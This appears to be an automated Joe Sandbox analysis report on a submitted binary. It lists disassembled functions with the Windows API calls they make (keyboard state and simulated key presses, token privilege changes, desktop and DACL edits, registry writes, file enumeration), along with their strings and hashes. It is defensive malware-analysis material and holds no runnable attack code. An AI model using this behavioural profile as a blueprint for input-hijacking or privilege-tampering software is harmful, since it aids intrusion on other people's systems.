Opcode Fuzzy Hash: 012f77758d58a808364537e6da6bc87374d070f73fdbdf91c70c5c0e775e33fb
Instruction Fuzzy Hash: C942BF34104341AFEB21CF28C988AAABFE5FF48350F040959F6D5D72A9C73AE854EB51

Function 00FA6F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FA71C3
_memset.LIBCMT ref: 00FA7539
_memmove.LIBCMT ref: 00FA76AC

Strings

[:<:]], xrefs: 00FA7479
\b(?=\w), xrefs: 00FE3769
\b(?<=\w), xrefs: 00FE3773
[:>:]], xrefs: 00FA7492
DEFINE, xrefs: 00FE2103
Q\E, xrefs: 00FA7FCB

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: edbaabd6eb7288ffacba7420e27496a73e94aa15257d5412e971dd4e362ea666
Instruction ID: 81888f4c74955fbaa649f8554ecaf5222b70a0b2428751d9e57fd2ce1d051581
Opcode Fuzzy Hash: edbaabd6eb7288ffacba7420e27496a73e94aa15257d5412e971dd4e362ea666
Instruction Fuzzy Hash: 8993B371E00259DFDB24CF59C885BADB7B1FF48320F25816AE945EB281E7749E81EB40

Function 00F948D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00F948DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FCD665
IsIconic.USER32(?), ref: 00FCD66E
ShowWindow.USER32(?,00000009), ref: 00FCD67B
SetForegroundWindow.USER32(?), ref: 00FCD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FCD69B
GetCurrentThreadId.KERNEL32 ref: 00FCD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FCD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00FCD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00FCD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00FCD6CF
SetForegroundWindow.USER32(?), ref: 00FCD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FCD6E7
keybd_event.USER32(00000012,00000000), ref: 00FCD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FCD6FC
keybd_event.USER32(00000012,00000000), ref: 00FCD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FCD70A
keybd_event.USER32(00000012,00000000), ref: 00FCD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FCD719
keybd_event.USER32(00000012,00000000), ref: 00FCD71E
SetForegroundWindow.USER32(?), ref: 00FCD721
AttachThreadInput.USER32(?,?,00000000), ref: 00FCD748

Strings

Shell_TrayWnd, xrefs: 00FCD660

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 98c9f30c7416a17e0424772f3c8678e533db5f1ccec60bf7332cc5baae0ed2c6
Instruction ID: 013d39b3d26b53419a4b5c9e2f700c07c6a53c2c8553715856af6562e7057f36
Opcode Fuzzy Hash: 98c9f30c7416a17e0424772f3c8678e533db5f1ccec60bf7332cc5baae0ed2c6
Instruction Fuzzy Hash: 6C315571A403197BEB305FA19C4AF7F7E6CEB44B60F104029FA04EA1C1D6B95901ABA1

Function 00FE8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00FE87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE882B
Part of subcall function 00FE87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE8858
Part of subcall function 00FE87E1: GetLastError.KERNEL32 ref: 00FE8865

_memset.LIBCMT ref: 00FE8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FE83A5
CloseHandle.KERNEL32(?), ref: 00FE83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FE83CD
GetProcessWindowStation.USER32 ref: 00FE83E6
SetProcessWindowStation.USER32(00000000), ref: 00FE83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FE840A

Part of subcall function 00FE81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FE8309), ref: 00FE81E0
Part of subcall function 00FE81CB: CloseHandle.KERNEL32(?,?,00FE8309), ref: 00FE81F2

Strings

, xrefs: 00FE8362
winsta0, xrefs: 00FE83C8
default, xrefs: 00FE8405

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 502b763b52604c543ccd8df940842e5d6a0a4be3e90f35ef45cf28bac9391ec6
Instruction ID: 2e809cb817feea119f0c2279013470da71103af8f31ba71a5d1530c3e6f75a4f
Opcode Fuzzy Hash: 502b763b52604c543ccd8df940842e5d6a0a4be3e90f35ef45cf28bac9391ec6
Instruction Fuzzy Hash: 87818C71D00289AFDF11EFA5CC45AEE7B78FF08364F184159F919A6160DB398E16EB20

Function 00FFC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FFC78D
FindClose.KERNEL32(00000000), ref: 00FFC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FFC844
__swprintf.LIBCMT ref: 00FFC890
__swprintf.LIBCMT ref: 00FFC8D3

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

__swprintf.LIBCMT ref: 00FFC927

Part of subcall function 00FB3698: __woutput_l.LIBCMT ref: 00FB36F1

__swprintf.LIBCMT ref: 00FFC975

Part of subcall function 00FB3698: __flsbuf.LIBCMT ref: 00FB3713
Part of subcall function 00FB3698: __flsbuf.LIBCMT ref: 00FB372B

__swprintf.LIBCMT ref: 00FFC9C4
__swprintf.LIBCMT ref: 00FFCA13
__swprintf.LIBCMT ref: 00FFCA62

Strings

%02d, xrefs: 00FFC91B, 00FFC925, 00FFC973, 00FFC9C2, 00FFCA11, 00FFCA60
%4d, xrefs: 00FFC8CD
%4d%02d%02d%02d%02d%02d, xrefs: 00FFC88A

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 3c88469a2cf5bd450aa21bd392fe85a2233c29cd19a2048a991d9736907ec9da
Instruction ID: 8223dd46aa106020ba9e84b9b1883878ab8d28598a18018e342faf20d255a5e3
Opcode Fuzzy Hash: 3c88469a2cf5bd450aa21bd392fe85a2233c29cd19a2048a991d9736907ec9da
Instruction Fuzzy Hash: D1A13CB1408305ABDB11EFA5CC86DAFB7ECEF99700F40091DF585C6151EA79EA08DB62

Function 00FFEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00FFEFB6
_wcscmp.LIBCMT ref: 00FFEFCB
_wcscmp.LIBCMT ref: 00FFEFE2
GetFileAttributesW.KERNEL32(?), ref: 00FFEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00FFF00E
FindNextFileW.KERNEL32(00000000,?), ref: 00FFF026
FindClose.KERNEL32(00000000), ref: 00FFF031
FindFirstFileW.KERNEL32(*.*,?), ref: 00FFF04D
_wcscmp.LIBCMT ref: 00FFF074
_wcscmp.LIBCMT ref: 00FFF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00FFF09D
SetCurrentDirectoryW.KERNEL32(01048920), ref: 00FFF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FFF0C5
FindClose.KERNEL32(00000000), ref: 00FFF0D2
FindClose.KERNEL32(00000000), ref: 00FFF0E4

Strings

*.*, xrefs: 00FFF048

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: d907ce548a2ce0abc9ef08934ab64649be325129ccb755b2309b30fb52a819ed
Instruction ID: 8cca3ee95f068e459582005087b59ab1186a65d66bf11143a057649c44dc703e
Opcode Fuzzy Hash: d907ce548a2ce0abc9ef08934ab64649be325129ccb755b2309b30fb52a819ed
Instruction Fuzzy Hash: 5131E53290020E7BDB24DAA5DC48AEE77AC9F44360F144166E944E20A1EF79DE48EB51

Function 01010857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01010953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0101F910,00000000,?,00000000,?,?), ref: 010109C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01010A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01010A92
RegCloseKey.ADVAPI32(?), ref: 01010DB2
RegCloseKey.ADVAPI32(00000000), ref: 01010DBF

Strings

REG_MULTI_SZ, xrefs: 01010B7A
REG_QWORD, xrefs: 01010D00
REG_BINARY, xrefs: 01010D4D
REG_EXPAND_SZ, xrefs: 01010A2F
REG_SZ, xrefs: 01010AD0
REG_DWORD, xrefs: 01010C83

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: d3bfa3f28f0fc44dd823557938eb453250f3be3e2b860a6c3213198d20ba75c5
Instruction ID: 3917bf50e1a60d20b2a876cec665e791be298a2d434f9151a2b55497ba74f2e4
Opcode Fuzzy Hash: d3bfa3f28f0fc44dd823557938eb453250f3be3e2b860a6c3213198d20ba75c5
Instruction Fuzzy Hash: D202AB756046019FDB54EF28C881E2AB7E5FF89324F05845CF88A9B366DB38ED45CB81

Function 00FFF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00FFF113
_wcscmp.LIBCMT ref: 00FFF128
_wcscmp.LIBCMT ref: 00FFF13F

Part of subcall function 00FF4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FF43A0

FindNextFileW.KERNEL32(00000000,?), ref: 00FFF16E
FindClose.KERNEL32(00000000), ref: 00FFF179
FindFirstFileW.KERNEL32(*.*,?), ref: 00FFF195
_wcscmp.LIBCMT ref: 00FFF1BC
_wcscmp.LIBCMT ref: 00FFF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00FFF1E5
SetCurrentDirectoryW.KERNEL32(01048920), ref: 00FFF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FFF20D
FindClose.KERNEL32(00000000), ref: 00FFF21A
FindClose.KERNEL32(00000000), ref: 00FFF22C

Strings

*.*, xrefs: 00FFF190

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 78f1bdaaaa945c7b4dc7b8e3ee5a86a8a9ca67445e2e311b804340095342507e
Instruction ID: 765be931eed324b033c92c2574c17948f95ab3d50e6a3a84a1c6ea000817d092
Opcode Fuzzy Hash: 78f1bdaaaa945c7b4dc7b8e3ee5a86a8a9ca67445e2e311b804340095342507e
Instruction Fuzzy Hash: 7C31053690061E7ADB20EEA0EC48AEE77AC9F45370F1441A5E940E21A0DB79DE49EF54

Function 00FFA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FFA20F
__swprintf.LIBCMT ref: 00FFA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00FFA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FFA293
_memset.LIBCMT ref: 00FFA2B2
_wcsncpy.LIBCMT ref: 00FFA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FFA323
CloseHandle.KERNEL32(00000000), ref: 00FFA32E
RemoveDirectoryW.KERNEL32(?), ref: 00FFA337
CloseHandle.KERNEL32(00000000), ref: 00FFA341

Strings

\??\%s, xrefs: 00FFA22B
:, xrefs: 00FFA252
\, xrefs: 00FFA247

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 48364dbd0a3ab87ad01885fedfdf31824c6a7978d128e2bfe093266f2e1f26ff
Instruction ID: a0f6793156c2cd13863ede1169085f8fbf2121ef0574592e42743099d906c3bf
Opcode Fuzzy Hash: 48364dbd0a3ab87ad01885fedfdf31824c6a7978d128e2bfe093266f2e1f26ff
Instruction Fuzzy Hash: BC31D4B190010AABDB20DFA0DC49FFB37BCEF89750F1041B6FA08D2160E77996449B25

Function 00FE7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FE821E
Part of subcall function 00FE8202: GetLastError.KERNEL32(?,00FE7CE2,?,?,?), ref: 00FE8228
Part of subcall function 00FE8202: GetProcessHeap.KERNEL32(00000008,?,?,00FE7CE2,?,?,?), ref: 00FE8237
Part of subcall function 00FE8202: HeapAlloc.KERNEL32(00000000,?,00FE7CE2,?,?,?), ref: 00FE823E
Part of subcall function 00FE8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FE8255

Part of subcall function 00FE829F: GetProcessHeap.KERNEL32(00000008,00FE7CF8,00000000,00000000,?,00FE7CF8,?), ref: 00FE82AB
Part of subcall function 00FE829F: HeapAlloc.KERNEL32(00000000,?,00FE7CF8,?), ref: 00FE82B2
Part of subcall function 00FE829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FE7CF8,?), ref: 00FE82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FE7D13
_memset.LIBCMT ref: 00FE7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FE7D47
GetLengthSid.ADVAPI32(?), ref: 00FE7D58
GetAce.ADVAPI32(?,00000000,?), ref: 00FE7D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FE7DB1
GetLengthSid.ADVAPI32(?), ref: 00FE7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FE7DDD
HeapAlloc.KERNEL32(00000000), ref: 00FE7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FE7E05
CopySid.ADVAPI32(00000000), ref: 00FE7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FE7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FE7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FE7E77

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: edb737e2ed0da32b0bc0797554059b38d4ee1e292fbeb538035bd8ee71b5d69d
Instruction ID: b9648694b66a064a839d42e6e2a3b262dfcb9c872a8a0cf78589efb05ff8a1df
Opcode Fuzzy Hash: edb737e2ed0da32b0bc0797554059b38d4ee1e292fbeb538035bd8ee71b5d69d
Instruction Fuzzy Hash: B2616D7190024AAFDF11EFA1DC44AEEBBB9FF04310F048259F955A7280DB399E05DB60

Function 00FA66E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

CR), xrefs: 00FE1287
LF), xrefs: 00FE12A4
LIMIT_MATCH=, xrefs: 00FE1170
NO_START_OPT), xrefs: 00FE114F
LIMIT_RECURSION=, xrefs: 00FE11FC
BSR_UNICODE), xrefs: 00FE1338
BSR_ANYCRLF), xrefs: 00FE131E
UTF16), xrefs: 00FE10CF
ANY), xrefs: 00FE12DE
ANYCRLF), xrefs: 00FE12FB
UCP), xrefs: 00FE110D
NO_AUTO_POSSESS), xrefs: 00FE112E
UTF), xrefs: 00FE10FA
CRLF), xrefs: 00FE12C1

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 2a582847b337ed47a2ca195330526bc0436862c58f35ac6132fa6b5e6422a1bd
Instruction ID: 1a3a1d109daf15b2a78c88fbd96d83a894a94cbd330e0bfc4d228674cea05c68
Opcode Fuzzy Hash: 2a582847b337ed47a2ca195330526bc0436862c58f35ac6132fa6b5e6422a1bd
Instruction Fuzzy Hash: 967293B5E00259CBDF24CF5AC8807AEB7B5FF49320F14816AE845EB290DB349D41EB90

Function 00FF001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00FF0097
SetKeyboardState.USER32(?), ref: 00FF0102
GetAsyncKeyState.USER32(000000A0), ref: 00FF0122
GetKeyState.USER32(000000A0), ref: 00FF0139
GetAsyncKeyState.USER32(000000A1), ref: 00FF0168
GetKeyState.USER32(000000A1), ref: 00FF0179
GetAsyncKeyState.USER32(00000011), ref: 00FF01A5
GetKeyState.USER32(00000011), ref: 00FF01B3
GetAsyncKeyState.USER32(00000012), ref: 00FF01DC
GetKeyState.USER32(00000012), ref: 00FF01EA
GetAsyncKeyState.USER32(0000005B), ref: 00FF0213
GetKeyState.USER32(0000005B), ref: 00FF0221

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4787bbd232433c33e3c2f0353a27ba10bd313d8dc4233f1ba8680c90875dcf39
Instruction ID: 2cbc60ae9f1b1e5b49e0d045b2bb8196d766b412e2ff7deeb06d82a0fd336a96
Opcode Fuzzy Hash: 4787bbd232433c33e3c2f0353a27ba10bd313d8dc4233f1ba8680c90875dcf39
Instruction Fuzzy Hash: EC51E730D0478C29FB35DBA089547BABFB49F01390F08459A97C2561D3DEA89B8CE761

Function 010103DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01010E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0100FDAD,?,?), ref: 01010E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010104AC

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0101054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010105E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01010822
RegCloseKey.ADVAPI32(00000000), ref: 0101082F

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 4de50a8ab663d151176aeb25c8bb1666ce6b163eda19a224a08a785e5c1c0ec6
Instruction ID: 8579c2221e9a46423867f29d41432fc3e61953112b521fa5598bce7418199eb0
Opcode Fuzzy Hash: 4de50a8ab663d151176aeb25c8bb1666ce6b163eda19a224a08a785e5c1c0ec6
Instruction Fuzzy Hash: E2E17070604204AFDB15DF28C885E2BBBE4FF89314F04896DF889DB265DB39E945CB91

Function 010083BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

CoInitialize.OLE32 ref: 01008403
CoUninitialize.OLE32 ref: 0100840E
CoCreateInstance.OLE32(?,00000000,00000017,01022BEC,?), ref: 0100846E
IIDFromString.OLE32(?,?), ref: 010084E1
VariantInit.OLEAUT32(?), ref: 0100857B
VariantClear.OLEAUT32(?), ref: 010085DC

Strings

Failed to create object, xrefs: 01008479, 0100852F
Invalid parameter, xrefs: 010084FA
